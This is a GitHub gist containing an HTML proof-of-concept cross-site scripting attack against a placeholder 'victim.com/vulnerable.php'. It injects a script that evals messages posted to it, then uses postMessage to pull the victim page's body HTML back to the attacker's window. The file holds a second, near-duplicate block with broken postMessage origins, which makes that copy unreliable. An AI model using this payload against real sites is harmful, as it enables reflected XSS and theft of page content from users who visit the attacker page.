ancat/gist:2862041

## gistfile1.html
<script>
    var w = window.open("http://www.victim.com/vulnerable.php?string=<script>window.addEventListener('message', function(e) {eval(e.data);}, false)</script>", "somewindow");
    w.postMessage("window.opener.postMessage(document.body.innerHTML, '*')", "*");
</script>
	<script>
	var w = window.open("http://www.victim.com/vulnerable.php?string=<script>window.addEventListener('message', function(e) {eval(e.data);}, false)</script>", "somewindow");
	w.postMessage("window.opener.postMessage(document.body.innerHTML, '')", "");
	</script>